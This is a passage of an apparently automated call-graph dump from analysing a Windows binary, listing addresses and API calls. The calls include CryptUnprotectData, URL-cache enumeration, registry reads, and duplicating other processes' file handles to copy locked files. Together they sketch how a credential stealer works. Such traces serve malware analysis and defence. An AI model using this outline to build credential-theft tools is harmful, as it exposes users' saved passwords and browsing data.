414c2e 17 API calls 39035->39036 39037 403eb7 39036->39037 39038 414c2e 17 API calls 39037->39038 39039 403ec5 39038->39039 39040 409d1f 6 API calls 39039->39040 39041 403ee2 39040->39041 39042 409d1f 6 API calls 39041->39042 39043 403efd 39042->39043 39044 409d1f 6 API calls 39043->39044 39045 403f15 39044->39045 39046 403af5 20 API calls 39045->39046 39047 403f29 39046->39047 39048 403af5 20 API calls 39047->39048 39049 403f3a 39048->39049 39050 40414f 33 API calls 39049->39050 39056 403f4f 39050->39056 39051 403faf 39750 40b1ab free free 39051->39750 39052 403f5b memset 39052->39056 39054 403fb7 39054->38674 39055 4099c6 2 API calls 39055->39056 39056->39051 39056->39052 39056->39055 39057 40a8ab 9 API calls 39056->39057 39057->39056 39059 414c2e 17 API calls 39058->39059 39060 403d26 39059->39060 39061 414c2e 17 API calls 39060->39061 39062 403d34 39061->39062 39063 409d1f 6 API calls 39062->39063 39064 403d51 39063->39064 39065 409d1f 6 API calls 39064->39065 39066 403d6c 39065->39066 39067 409d1f 6 API calls 39066->39067 39068 403d84 39067->39068 39069 403af5 20 API calls 39068->39069 39070 403d98 39069->39070 39071 403af5 20 API calls 39070->39071 39072 403da9 39071->39072 39073 40414f 33 API calls 39072->39073 39079 403dbe 39073->39079 39074 403e1e 39751 40b1ab free free 39074->39751 39076 403dca memset 39076->39079 39077 403e26 39077->38680 39078 4099c6 2 API calls 39078->39079 39079->39074 39079->39076 39079->39078 39080 40a8ab 9 API calls 39079->39080 39080->39079 39082 414b81 9 API calls 39081->39082 39083 414c40 39082->39083 39084 414c73 memset 39083->39084 39752 409cea 39083->39752 39085 414c94 39084->39085 39755 414592 RegOpenKeyExW 39085->39755 39088 414c64 SHGetSpecialFolderPathW 39089 414d0b 39088->39089 39089->38720 39090 414cf4 wcscpy 39090->39089 39091 414cc1 39091->39090 39756 414bb0 wcscpy 39091->39756 39094 414cd2 39757 4145ac RegQueryValueExW 39094->39757 39096 414ce9 RegCloseKey 39096->39090 39098 409d62 39097->39098 39099 409d43 wcscpy 39097->39099 39102 445389 39098->39102 39100 409719 2 API calls 39099->39100 39101 409d51 wcscat 39100->39101 39101->39098 39103 40ae18 9 API calls 39102->39103 39105 4453c4 39103->39105 39104 40ae51 9 API calls 39104->39105 39105->39104 39106 4453f3 39105->39106 39107 40add4 2 API calls 39105->39107 39110 445403 254 API calls 39105->39110 39108 40aebe FindClose 39106->39108 39107->39105 39109 4453fe 39108->39109 39109->38770 39110->39105 39111->38672 39112->38761 39113->38729 39114->38729 39115->38781 39117 409c89 39116->39117 39117->38801 39118->38832 39120 413d39 39119->39120 39121 413d2f FreeLibrary 39119->39121 39122 40b633 free 39120->39122 39121->39120 39123 413d42 39122->39123 39124 40b633 free 39123->39124 39125 413d4a 39124->39125 39125->38660 39126->38668 39127->38659 39128->38732 39130 44db70 39129->39130 39131 40b6fc memset 39130->39131 39132 409c70 2 API calls 39131->39132 39133 40b732 wcsrchr 39132->39133 39134 40b743 39133->39134 39135 40b746 memset 39133->39135 39134->39135 39136 40b2cc 27 API calls 39135->39136 39137 40b76f 39136->39137 39138 409d1f 6 API calls 39137->39138 39139 40b783 39138->39139 39758 409b98 GetFileAttributesW 39139->39758 39141 40b792 39142 40b7c2 39141->39142 39143 409c70 2 API calls 39141->39143 39759 40bb98 39142->39759 39146 40b7a5 39143->39146 39149 40b2cc 27 API calls 39146->39149 39147 40b837 CloseHandle 39151 40b83e memset 39147->39151 39148 40b817 39150 409a45 3 API calls 39148->39150 39152 40b7b2 39149->39152 39153 40b827 CopyFileW 39150->39153 39792 40a6e6 WideCharToMultiByte 39151->39792 39155 409d1f 6 API calls 39152->39155 39153->39151 39155->39142 39156 40b866 39793 444432 39156->39793 39159 40bad5 39161 40baeb 39159->39161 39162 40bade DeleteFileW 39159->39162 39160 40b273 27 API calls 39164 40b89a 39160->39164 39163 40b04b ??3@YAXPAX 39161->39163 39162->39161 39165 40baf3 39163->39165 39839 438552 39164->39839 39165->38742 39168 40bacd 39870 443d90 111 API calls 39168->39870 39171 40bac6 39869 424f26 123 API calls 39171->39869 39172 40b8bd memset 39860 425413 17 API calls 39172->39860 39175 425413 17 API calls 39193 40b8b8 39175->39193 39178 40a71b MultiByteToWideChar 39178->39193 39179 40a734 MultiByteToWideChar 39179->39193 39182 40b9b5 memcmp 39182->39193 39183 4099c6 2 API calls 39183->39193 39184 404423 38 API calls 39184->39193 39187 40bb3e memset memcpy 39871 40a734 MultiByteToWideChar 39187->39871 39188 4251c4 137 API calls 39188->39193 39190 40bb88 LocalFree 39190->39193 39193->39171 39193->39172 39193->39175 39193->39178 39193->39179 39193->39182 39193->39183 39193->39184 39193->39187 39193->39188 39194 40ba5f memcmp 39193->39194 39861 4253ef 16 API calls 39193->39861 39862 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39193->39862 39863 4253af 17 API calls 39193->39863 39864 4253cf 17 API calls 39193->39864 39865 447280 memset 39193->39865 39866 447960 memset memcpy memcpy memcpy 39193->39866 39867 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39193->39867 39868 447920 memcpy memcpy memcpy 39193->39868 39194->39193 39195->38735 39197 40aebe FindClose 39196->39197 39198 40ae21 39197->39198 39199 4099c6 2 API calls 39198->39199 39200 40ae35 39199->39200 39201 409d1f 6 API calls 39200->39201 39202 40ae49 39201->39202 39202->38776 39204 40ade0 39203->39204 39207 40ae0f 39203->39207 39205 40ade7 wcscmp 39204->39205 39204->39207 39206 40adfe wcscmp 39205->39206 39205->39207 39206->39207 39207->38776 39209 40ae7b FindNextFileW 39208->39209 39210 40ae5c FindFirstFileW 39208->39210 39211 40ae94 39209->39211 39212 40ae8f 39209->39212 39210->39211 39213 409d1f 6 API calls 39211->39213 39215 40aeb6 39211->39215 39214 40aebe FindClose 39212->39214 39213->39215 39214->39211 39215->38776 39217 40aed1 39216->39217 39218 40aec7 FindClose 39216->39218 39217->38791 39218->39217 39220 4099d7 39219->39220 39221 4099da memcpy 39219->39221 39220->39221 39221->38718 39223 40b2cc 27 API calls 39222->39223 39224 44543f 39223->39224 39225 409d1f 6 API calls 39224->39225 39226 44544f 39225->39226 40137 409b98 GetFileAttributesW 39226->40137 39228 44545e 39229 445476 39228->39229 39230 40b6ef 253 API calls 39228->39230 39231 40b2cc 27 API calls 39229->39231 39230->39229 39232 445482 39231->39232 39233 409d1f 6 API calls 39232->39233 39234 445492 39233->39234 40138 409b98 GetFileAttributesW 39234->40138 39236 4454a1 39237 4454b9 39236->39237 39238 40b6ef 253 API calls 39236->39238 39237->38747 39238->39237 39239->38689 39240->38771 39241->38773 39242->38812 39243->38794 39244->38840 39245->38840 39246->38822 39247->38851 39248->38853 39249->38855 39251 414c2e 17 API calls 39250->39251 39252 40c2ae 39251->39252 39308 40c1d3 39252->39308 39257 40c3be 39274 40a8ab 39257->39274 39258 40afcf 2 API calls 39259 40c2fd FindFirstUrlCacheEntryW 39258->39259 39260 40c3b6 39259->39260 39261 40c31e wcschr 39259->39261 39262 40b04b ??3@YAXPAX 39260->39262 39263 40c331 39261->39263 39264 40c35e FindNextUrlCacheEntryW 39261->39264 39262->39257 39266 40a8ab 9 API calls 39263->39266 39264->39261 39265 40c373 GetLastError 39264->39265 39267 40c3ad FindCloseUrlCache 39265->39267 39268 40c37e 39265->39268 39269 40c33e wcschr 39266->39269 39267->39260 39270 40afcf 2 API calls 39268->39270 39269->39264 39271 40c34f 39269->39271 39272 40c391 FindNextUrlCacheEntryW 39270->39272 39273 40a8ab 9 API calls 39271->39273 39272->39261 39272->39267 39273->39264 39463 40a97a 39274->39463 39277 40a8cc 39277->38862 39278 40a8d0 7 API calls 39278->39277 39468 40b1ab free free 39279->39468 39281 40c3dd 39282 40b2cc 27 API calls 39281->39282 39283 40c3e7 39282->39283 39469 414592 RegOpenKeyExW 39283->39469 39285 40c3f4 39286 40c50e 39285->39286 39287 40c3ff 39285->39287 39301 405337 39286->39301 39288 40a9ce 4 API calls 39287->39288 39289 40c418 memset 39288->39289 39470 40aa1d 39289->39470 39292 40c471 39294 40c47a _wcsupr 39292->39294 39293 40c505 RegCloseKey 39293->39286 39295 40a8d0 7 API calls 39294->39295 39296 40c498 39295->39296 39297 40a8d0 7 API calls 39296->39297 39298 40c4ac memset 39297->39298 39299 40aa1d 39298->39299 39300 40c4e4 RegEnumValueW 39299->39300 39300->39293 39300->39294 39472 405220 39301->39472 39304->38873 39305->38875 39306->38876 39307->38869 39309 40ae18 9 API calls 39308->39309 39315 40c210 39309->39315 39310 40ae51 9 API calls 39310->39315 39311 40c264 39312 40aebe FindClose 39311->39312 39314 40c26f 39312->39314 39313 40add4 2 API calls 39313->39315 39320 40e5ed memset memset 39314->39320 39315->39310 39315->39311 39315->39313 39316 40c231 _wcsicmp 39315->39316 39317 40c1d3 35 API calls 39315->39317 39316->39315 39318 40c248 39316->39318 39317->39315 39333 40c084 22 API calls 39318->39333 39321 414c2e 17 API calls 39320->39321 39322 40e63f 39321->39322 39323 409d1f 6 API calls 39322->39323 39324 40e658 39323->39324 39334 409b98 GetFileAttributesW 39324->39334 39326 40e667 39327 40e680 39326->39327 39328 409d1f 6 API calls 39326->39328 39335 409b98 GetFileAttributesW 39327->39335 39328->39327 39330 40e68f 39331 40c2d8 39330->39331 39336 40e4b2 39330->39336 39331->39257 39331->39258 39333->39315 39334->39326 39335->39330 39357 40e01e 39336->39357 39338 40e593 39339 40e5b0 39338->39339 39340 40e59c DeleteFileW 39338->39340 39341 40b04b ??3@YAXPAX 39339->39341 39340->39339 39343 40e5bb 39341->39343 39342 40e521 39342->39338 39380 40e175 39342->39380 39345 40e5c4 CloseHandle 39343->39345 39346 40e5cc 39343->39346 39345->39346 39347 40b633 free 39346->39347 39349 40e5db 39347->39349 39348 40e573 39350 40e584 39348->39350 39351 40e57c CloseHandle 39348->39351 39353 40b633 free 39349->39353 39401 40b1ab free free 39350->39401 39351->39350 39352 40e540 39352->39348 39400 40e2ab 30 API calls 39352->39400 39355 40e5e3 39353->39355 39355->39331 39402 406214 39357->39402 39360 40e16b 39360->39342 39363 40afcf 2 API calls 39364 40e08d OpenProcess 39363->39364 39365 40e0a4 GetCurrentProcess DuplicateHandle 39364->39365 39369 40e152 39364->39369 39366 40e0d0 GetFileSize 39365->39366 39367 40e14a CloseHandle 39365->39367 39438 409a45 GetTempPathW 39366->39438 39367->39369 39368 40e160 39372 40b04b ??3@YAXPAX 39368->39372 39369->39368 39371 406214 22 API calls 39369->39371 39371->39368 39372->39360 39373 40e0ea 39441 4096dc CreateFileW 39373->39441 39375 40e0f1 CreateFileMappingW 39376 40e140 CloseHandle CloseHandle 39375->39376 39377 40e10b MapViewOfFile 39375->39377 39376->39367 39378 40e13b CloseHandle 39377->39378 39379 40e11f WriteFile UnmapViewOfFile 39377->39379 39378->39376 39379->39378 39381 40e18c 39380->39381 39442 406b90 39381->39442 39384 40e1a7 memset 39390 40e1e8 39384->39390 39385 40e299 39452 4069a3 39385->39452 39391 40e283 39390->39391 39392 40dd50 _wcsicmp 39390->39392 39398 40e244 _snwprintf 39390->39398 39459 406e8f 13 API calls 39390->39459 39460 40742e 8 API calls 39390->39460 39461 40aae3 wcslen wcslen _memicmp 39390->39461 39462 406b53 SetFilePointerEx ReadFile 39390->39462 39393 40e291 39391->39393 39394 40e288 free 39391->39394 39392->39390 39395 40aa04 free 39393->39395 39394->39393 39395->39385 39399 40a8d0 7 API calls 39398->39399 39399->39390 39400->39352 39401->39338 39403 406294 CloseHandle 39402->39403 39404 406224 39403->39404 39405 4096c3 CreateFileW 39404->39405 39406 40622d 39405->39406 39407 406281 GetLastError 39406->39407 39409 40a2ef ReadFile 39406->39409 39408 40625a 39407->39408 39408->39360 39413 40dd85 memset 39408->39413 39410 406244 39409->39410 39410->39407 39411 40624b 39410->39411 39411->39408 39412 406777 19 API calls 39411->39412 39412->39408 39414 409bca GetModuleFileNameW 39413->39414 39415 40ddbe CreateFileW 39414->39415 39418 40ddf1 39415->39418 39416 40afcf ??2@YAPAXI ??3@YAXPAX 39416->39418 39417 41352f 9 API calls 39417->39418 39418->39416 39418->39417 39419 40de0b NtQuerySystemInformation 39418->39419 39420 40de3b CloseHandle GetCurrentProcessId 39418->39420 39419->39418 39421 40de54 39420->39421 39422 413d4c 47 API calls 39421->39422 39430 40de88 39422->39430 39423 40e00c 39424 413d29 free FreeLibrary 39423->39424 39425 40e014 39424->39425 39425->39360 39425->39363 39426 40dea9 _wcsicmp 39427 40dee7 OpenProcess 39426->39427 39428 40debd _wcsicmp 39426->39428 39427->39430 39428->39427 39429 40ded0 _wcsicmp 39428->39429 39429->39427 39429->39430 39430->39423 39430->39426 39431 40dfef CloseHandle 39430->39431 39432 40df78 39430->39432 39433 40df23 GetCurrentProcess DuplicateHandle 39430->39433 39436 40df8f CloseHandle 39430->39436 39431->39430 39432->39431 39432->39436 39437 40dfae _wcsicmp 39432->39437 39433->39430 39434 40df4c memset 39433->39434 39435 41352f 9 API calls 39434->39435 39435->39430 39436->39432 39437->39430 39437->39432 39439 409a74 GetTempFileNameW 39438->39439 39440 409a66 GetWindowsDirectoryW 39438->39440 39439->39373 39440->39439 39441->39375 39443 406bd5 39442->39443 39444 406bad 39442->39444 39446 4066bf free malloc memcpy free free 39443->39446 39451 406c0f 39443->39451 39444->39443 39445 406bba _wcsicmp 39444->39445 39445->39443 39445->39444 39447 406be5 39446->39447 39448 40afcf ??2@YAPAXI ??3@YAXPAX 39447->39448 39447->39451 39449 406bff 39448->39449 39450 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39449->39450 39450->39451 39451->39384 39451->39385 39453 4069c4 ??3@YAXPAX 39452->39453 39454 4069af 39453->39454 39455 40b633 free 39454->39455 39456 4069ba 39455->39456 39457 40b04b ??3@YAXPAX 39456->39457 39458 4069c2 39457->39458 39458->39352 39459->39390 39460->39390 39461->39390 39462->39390 39467 40a980 39463->39467 39464 40a8bb 39464->39277 39464->39278 39465 40a995 _wcsicmp 39465->39467 39466 40a99c wcscmp 39466->39467 39467->39464 39467->39465 39467->39466 39468->39281 39469->39285 39471 40aa23 RegEnumValueW 39470->39471 39471->39292 39471->39293 39473 405335 39472->39473 39474 40522a 39472->39474 39473->38876 39475 40b2cc 27 API calls 39474->39475 39476 405234 39475->39476 39477 40a804 8 API calls 39476->39477 39478 40523a 39477->39478 39517 40b273 39478->39517 39480 405248 _mbscpy _mbscat GetProcAddress 39481 40b273 27 API calls 39480->39481 39482 405279 39481->39482 39520 405211 GetProcAddress 39482->39520 39484 405282 39485 40b273 27 API calls 39484->39485 39486 40528f 39485->39486 39521 405211 GetProcAddress 39486->39521 39488 405298 39489 40b273 27 API calls 39488->39489 39490 4052a5 39489->39490 39522 405211 GetProcAddress 39490->39522 39492 4052ae 39493 40b273 27 API calls 39492->39493 39494 4052bb 39493->39494 39523 405211 GetProcAddress 39494->39523 39496 4052c4 39497 40b273 27 API calls 39496->39497 39498 4052d1 39497->39498 39524 405211 GetProcAddress 39498->39524 39500 4052da 39501 40b273 27 API calls 39500->39501 39502 4052e7 39501->39502 39525 405211 GetProcAddress 39502->39525 39504 4052f0 39505 40b273 27 API calls 39504->39505 39506 4052fd 39505->39506 39526 405211 GetProcAddress 39506->39526 39508 405306 39509 40b273 27 API calls 39508->39509 39510 405313 39509->39510 39527 405211 GetProcAddress 39510->39527 39512 40531c 39513 40b273 27 API calls 39512->39513 39514 405329 39513->39514 39528 405211 GetProcAddress 39514->39528 39516 405332 39516->39473 39518 40b58d 27 API calls 39517->39518 39519 40b18c 39518->39519 39519->39480 39520->39484 39521->39488 39522->39492 39523->39496 39524->39500 39525->39504 39526->39508 39527->39512 39528->39516 39530 40440c FreeLibrary 39529->39530 39531 40436d 39530->39531 39532 40a804 8 API calls 39531->39532 39533 404377 39532->39533 39534 404383 39533->39534 39535 404405 39533->39535 39536 40b273 27 API calls 39534->39536 39535->38883 39535->38885 39537 40438d GetProcAddress 39536->39537 39538 40b273 27 API calls 39537->39538 39539 4043a7 GetProcAddress 39538->39539 39540 40b273 27 API calls 39539->39540 39541 4043ba GetProcAddress 39540->39541 39542 40b273 27 API calls 39541->39542 39543 4043ce GetProcAddress 39542->39543 39544 40b273 27 API calls 39543->39544 39545 4043e2 GetProcAddress 39544->39545 39546 4043f1 39545->39546 39547 4043f7 39546->39547 39548 40440c FreeLibrary 39546->39548 39547->39535 39548->39535 39550 404413 FreeLibrary 39549->39550 39551 40441e 39549->39551 39550->39551 39551->38896 39552->38893 39554 40447e 39553->39554 39555 40442e 39553->39555 39556 404485 CryptUnprotectData 39554->39556 39557 40449c 39554->39557 39558 40b2cc 27 API calls 39555->39558 39556->39557 39557->38893 39559 404438 39558->39559 39560 40a804 8 API calls 39559->39560 39561 40443e 39560->39561 39562 404445 39561->39562 39564 404467 39561->39564 39563 40b273 27 API calls 39562->39563 39565 40444f GetProcAddress 39563->39565 39564->39554 39566 404475 FreeLibrary 39564->39566 39565->39564 39567 404460 39565->39567 39566->39554 39567->39564 39569 4135f6 39568->39569 39570 4135eb FreeLibrary 39568->39570 39569->38899 39570->39569 39572 4449c4 39571->39572 39573 444a52 39571->39573 39574 40b2cc 27 API calls 39572->39574 39573->38919 39573->38920 39575 4449cb 39574->39575 39576 40a804 8 API calls 39575->39576 39577 4449d1 39576->39577 39578 40b273 27 API calls 39577->39578 39579 4449dc GetProcAddress 39578->39579 39580 40b273 27 API calls 39579->39580 39581 4449f3 GetProcAddress 39580->39581 39582 40b273 27 API calls 39581->39582 39583 444a04 GetProcAddress 39582->39583 39584 40b273 27 API calls 39583->39584 39585 444a15 GetProcAddress 39584->39585 39586 40b273 27 API calls 39585->39586 39587 444a26 GetProcAddress 39586->39587 39588 40b273 27 API calls 39587->39588 39589 444a37 GetProcAddress 39588->39589 39590 40b273 27 API calls 39589->39590 39591 444a48 GetProcAddress 39590->39591 39591->39573 39592->38930 39593->38930 39594->38930 39595->38930 39596->38921 39598 403a29 39597->39598 39612 403bed memset memset 39598->39612 39600 403ae7 39625 40b1ab free free 39600->39625 39601 403a3f memset 39604 403a2f 39601->39604 39603 403aef 39603->38936 39604->39600 39604->39601 39605 40a8d0 7 API calls 39604->39605 39606 409d1f 6 API calls 39604->39606 39607 409b98 GetFileAttributesW 39604->39607 39605->39604 39606->39604 39607->39604 39609 40a051 GetFileTime CloseHandle 39608->39609 39610 4039ca CompareFileTime 39608->39610 39609->39610 39610->38936 39611->38937 39613 414c2e 17 API calls 39612->39613 39614 403c38 39613->39614 39615 409719 2 API calls 39614->39615 39616 403c3f wcscat 39615->39616 39617 414c2e 17 API calls 39616->39617 39618 403c61 39617->39618 39619 409719 2 API calls 39618->39619 39620 403c68 wcscat 39619->39620 39626 403af5 39620->39626 39623 403af5 20 API calls 39624 403c95 39623->39624 39624->39604 39625->39603 39627 403b02 39626->39627 39628 40ae18 9 API calls 39627->39628 39634 403b37 39628->39634 39629 403bdb 39631 40aebe FindClose 39629->39631 39630 40add4 wcscmp wcscmp 39630->39634 39632 403be6 39631->39632 39632->39623 39633 40ae18 9 API calls 39633->39634 39634->39629 39634->39630 39634->39633 39635 40ae51 9 API calls 39634->39635 39636 40aebe FindClose 39634->39636 39637 40a8d0 7 API calls 39634->39637 39635->39634 39636->39634 39637->39634 39639 409d1f 6 API calls 39638->39639 39640 404190 39639->39640 39653 409b98 GetFileAttributesW 39640->39653 39642 40419c 39643 4041a7 6 API calls 39642->39643 39644 40435c 39642->39644 39646 40424f 39643->39646 39644->38959 39646->39644 39647 40425e memset 39646->39647 39649 409d1f 6 API calls 39646->39649 39650 40a8ab 9 API calls 39646->39650 39654 414842 39646->39654 39647->39646 39648 404296 wcscpy 39647->39648 39648->39646 39649->39646 39651 4042b6 memset memset _snwprintf wcscpy 39650->39651 39651->39646 39652->38963 39653->39642 39657 41443e 39654->39657 39656 414866 39656->39646 39658 41444b 39657->39658 39659 414451 39658->39659 39660 4144a3 GetPrivateProfileStringW 39658->39660 39661 414491 39659->39661 39662 414455 wcschr 39659->39662 39660->39656 39664 414495 WritePrivateProfileStringW 39661->39664 39662->39661 39663 414463 _snwprintf 39662->39663 39663->39664 39664->39656 39665->38968 39667 40b2cc 27 API calls 39666->39667 39668 409615 39667->39668 39669 409d1f 6 API calls 39668->39669 39670 409625 39669->39670 39693 409b98 GetFileAttributesW 39670->39693 39672 409648 39674 40b2cc 27 API calls 39672->39674 39677 408801 39672->39677 39673 409634 39673->39672 39710 4091b8 241 API calls 39673->39710 39676 40965d 39674->39676 39678 409d1f 6 API calls 39676->39678 39677->38971 39677->39015 39679 40966d 39678->39679 39694 409b98 GetFileAttributesW 39679->39694 39681 40967c 39681->39677 39695 409529 39681->39695 39683->38993 39684->39015 39685->38998 39686->39015 39687->39003 39693->39673 39694->39681 39711 4096c3 CreateFileW 39695->39711 39697 409543 39698 409550 GetFileSize 39697->39698 39709 4095cd 39697->39709 39699 409577 CloseHandle 39698->39699 39700 40955f 39698->39700 39702 409585 39699->39702 39699->39709 39701 40afcf 2 API calls 39700->39701 39703 409569 39701->39703 39706 4095c3 39702->39706 39702->39709 39713 408b8d 38 API calls 39702->39713 39712 40a2ef ReadFile 39703->39712 39705 409574 39705->39699 39714 40908b 57 API calls 39706->39714 39709->39677 39710->39672 39711->39697 39712->39705 39713->39702 39714->39709 39742 413f4f 39715->39742 39718 413f37 K32GetModuleFileNameExW 39719 413f4a 39718->39719 39719->39032 39721 413969 wcscpy 39720->39721 39722 41396c wcschr 39720->39722 39733 413a3a 39721->39733 39722->39721 39724 41398e 39722->39724 39747 4097f7 wcslen wcslen _memicmp 39724->39747 39726 41399a 39727 4139a4 memset 39726->39727 39728 4139e6 39726->39728 39748 409dd5 GetWindowsDirectoryW wcscpy 39727->39748 39729 413a31 wcscpy 39728->39729 39730 4139ec memset 39728->39730 39729->39733 39749 409dd5 GetWindowsDirectoryW wcscpy 39730->39749 39733->39032 39734 4139c9 wcscpy wcscat 39734->39733 39735 413a11 memcpy wcscat 39735->39733 39737 413cb0 GetModuleHandleW 39736->39737 39738 413cda 39736->39738 39737->39738 39739 413cbf GetProcAddress 39737->39739 39740 413ce3 GetProcessTimes 39738->39740 39741 413cf6 39738->39741 39739->39738 39740->39034 39741->39034 39743 413f2f 39742->39743 39744 413f54 39742->39744 39743->39718 39743->39719 39745 40a804 8 API calls 39744->39745 39746 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39745->39746 39746->39743 39747->39726 39748->39734 39749->39735 39750->39054 39751->39077 39753 409cf9 GetVersionExW 39752->39753 39754 409d0a 39752->39754 39753->39754 39754->39084 39754->39088 39755->39091 39756->39094 39757->39096 39758->39141 39760 40bba5 39759->39760 39872 40cc26 39760->39872 39763 40bd4b 39893 40cc0c 39763->39893 39768 40b2cc 27 API calls 39769 40bbef 39768->39769 39900 40ccf0 _wcsicmp 39769->39900 39771 40bbf5 39771->39763 39901 40ccb4 6 API calls 39771->39901 39773 40bc26 39774 40cf04 17 API calls 39773->39774 39775 40bc2e 39774->39775 39776 40bd43 39775->39776 39777 40b2cc 27 API calls 39775->39777 39778 40cc0c 4 API calls 39776->39778 39779 40bc40 39777->39779 39778->39763 39902 40ccf0 _wcsicmp 39779->39902 39781 40bc46 39781->39776 39782 40bc61 memset memset WideCharToMultiByte 39781->39782 39903 40103c strlen 39782->39903 39784 40bcc0 39785 40b273 27 API calls 39784->39785 39786 40bcd0 memcmp 39785->39786 39786->39776 39787 40bce2 39786->39787 39788 404423 38 API calls 39787->39788 39789 40bd10 39788->39789 39789->39776 39790 40bd3a LocalFree 39789->39790 39791 40bd1f memcpy 39789->39791 39790->39776 39791->39790 39792->39156 39963 4438b5 39793->39963 39795 44444c 39796 40b879 39795->39796 39977 415a6d 39795->39977 39796->39159 39796->39160 39799 444486 39801 4444b9 memcpy 39799->39801 39838 4444a4 39799->39838 39800 44469e 39800->39796 40024 443d90 111 API calls 39800->40024 39981 415258 39801->39981 39804 444524 39805 444541 39804->39805 39806 44452a 39804->39806 39984 444316 39805->39984 40014 416935 16 API calls 39806->40014 39810 444316 18 API calls 39811 444563 39810->39811 39812 444316 18 API calls 39811->39812 39813 44456f 39812->39813 39814 444316 18 API calls 39813->39814 39815 44457f 39814->39815 39816 432d4e 3 API calls 39815->39816 39815->39838 39817 444596 39816->39817 39818 444316 18 API calls 39817->39818 39819 4445b0 39818->39819 39998 41eed2 39819->39998 39821 4445cf 39822 4445d6 39821->39822 39823 4445ee 39821->39823 40015 416935 16 API calls 39822->40015 40016 43302c memset 39823->40016 39825 4445fa 40017 43302c memset 39825->40017 39828 444609 39828->39838 40018 416935 16 API calls 39828->40018 39830 444646 40019 434d4b 17 API calls 39830->40019 39832 44464d 40020 437655 16 API calls 39832->40020 39834 444653 40021 4442e6 11 API calls 39834->40021 39836 44465d 39836->39838 40022 416935 16 API calls 39836->40022 40023 4442e6 11 API calls 39838->40023 39840 438460 134 API calls 39839->39840 39841 40b8a4 39840->39841 39841->39168 39842 4251c4 39841->39842 40071 424f07 11 API calls 39842->40071 39844 4251e4 39845 4251f7 39844->39845 39846 4251e8 39844->39846 40073 4250f8 39845->40073 40072 4446ea 11 API calls 39846->40072 39848 4251f2 39848->39193 39850 425209 39852 425249 39850->39852 39856 4250f8 127 API calls 39850->39856 39857 425287 39850->39857 40081 4384e9 135 API calls 39850->40081 40082 424f74 124 API calls 39850->40082 39852->39857 40083 424ff0 13 API calls 39852->40083 39856->39850 40085 415c7d 16 API calls 39857->40085 39858 425266 39858->39857 40084 415be9 memcpy 39858->40084 39860->39193 39861->39193 39862->39193 39863->39193 39864->39193 39865->39193 39866->39193 39867->39193 39868->39193 39869->39168 39870->39159 39871->39190 39904 4096c3 CreateFileW 39872->39904 39874 40cc34 39875 40cc3d GetFileSize 39874->39875 39883 40bbca 39874->39883 39876 40afcf 2 API calls 39875->39876 39877 40cc64 39876->39877 39905 40a2ef ReadFile 39877->39905 39879 40cc71 39906 40ab4a MultiByteToWideChar 39879->39906 39881 40cc95 CloseHandle 39882 40b04b ??3@YAXPAX 39881->39882 39882->39883 39883->39763 39884 40cf04 39883->39884 39885 40b633 free 39884->39885 39886 40cf14 39885->39886 39912 40b1ab free free 39886->39912 39888 40bbdd 39888->39763 39888->39768 39889 40cf1b 39889->39888 39891 40cfef 39889->39891 39913 40cd4b 39889->39913 39892 40cd4b 14 API calls 39891->39892 39892->39888 39894 40b633 free 39893->39894 39895 40cc15 39894->39895 39896 40aa04 free 39895->39896 39897 40cc1d 39896->39897 39962 40b1ab free free 39897->39962 39899 40b7d4 memset CreateFileW 39899->39147 39899->39148 39900->39771 39901->39773 39902->39781 39903->39784 39904->39874 39905->39879 39907 40ab93 39906->39907 39908 40ab6b 39906->39908 39907->39881 39909 40a9ce 4 API calls 39908->39909 39910 40ab74 39909->39910 39911 40ab7c MultiByteToWideChar 39910->39911 39911->39907 39912->39889 39914 40cd7b 39913->39914 39947 40aa29 39914->39947 39916 40cef5 39917 40aa04 free 39916->39917 39918 40cefd 39917->39918 39918->39889 39920 40aa29 6 API calls 39921 40ce1d 39920->39921 39922 40aa29 6 API calls 39921->39922 39923 40ce3e 39922->39923 39924 40ce6a 39923->39924 39955 40abb7 wcslen memmove 39923->39955 39925 40ce9f 39924->39925 39958 40abb7 wcslen memmove 39924->39958 39927 40a8d0 7 API calls 39925->39927 39930 40ceb5 39927->39930 39928 40ce56 39956 40aa71 wcslen 39928->39956 39936 40a8d0 7 API calls 39930->39936 39932 40ce8b 39959 40aa71 wcslen 39932->39959 39933 40ce5e 39957 40abb7 wcslen memmove 39933->39957 39938 40cecb 39936->39938 39937 40ce93 39960 40abb7 wcslen memmove 39937->39960 39961 40d00b malloc memcpy free free 39938->39961 39941 40cedd 39942 40aa04 free 39941->39942 39943 40cee5 39942->39943 39944 40aa04 free 39943->39944 39945 40ceed 39944->39945 39946 40aa04 free 39945->39946 39946->39916 39948 40aa33 39947->39948 39949 40aa63 39947->39949 39950 40aa44 39948->39950 39951 40aa38 wcslen 39948->39951 39949->39916 39949->39920 39952 40a9ce 4 API calls 39950->39952 39951->39950 39953 40aa4d 39952->39953 39953->39949 39954 40aa51 memcpy 39953->39954 39954->39949 39955->39928 39956->39933 39957->39924 39958->39932 39959->39937 39960->39925 39961->39941 39962->39899 39964 4438d0 39963->39964 39976 4438c9 39963->39976 40025 415378 memcpy memcpy 39964->40025 39976->39795 39978 415a77 39977->39978 39979 415a8d 39978->39979 39980 415a7e memset 39978->39980 39979->39799 39980->39979 39982 4438b5 11 API calls 39981->39982 39983 41525d 39982->39983 39983->39804 39985 444328 39984->39985 39986 444423 39985->39986 39987 44434e 39985->39987 40028 4446ea 11 API calls 39986->40028 39988 432d4e 3 API calls 39987->39988 39990 44435a 39988->39990 39992 444375 39990->39992 39997 44438b 39990->39997 39991 432d4e 3 API calls 39993 4443ec 39991->39993 40026 416935 16 API calls 39992->40026 39995 444381 39993->39995 40027 416935 16 API calls 39993->40027 39995->39810 39997->39991 39999 41eee2 39998->39999 40000 415a6d memset 39999->40000 40001 41ef23 40000->40001 40002 41ef2d 40001->40002 40003 415a6d memset 40001->40003 40002->39821 40004 41ef42 40003->40004 40013 41ef49 40004->40013 40029 41b7d9 40004->40029 40006 41ef66 40007 41ef74 memset 40006->40007 40006->40013 40009 41ef91 40007->40009 40011 41ef9e 40007->40011 40010 41519d 6 API calls 40009->40010 40010->40011 40011->40013 40043 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40011->40043 40013->40002 40044 41b321 101 API calls 40013->40044 40014->39838 40015->39838 40016->39825 40017->39828 40018->39830 40019->39832 40020->39834 40021->39836 40022->39838 40023->39800 40024->39796 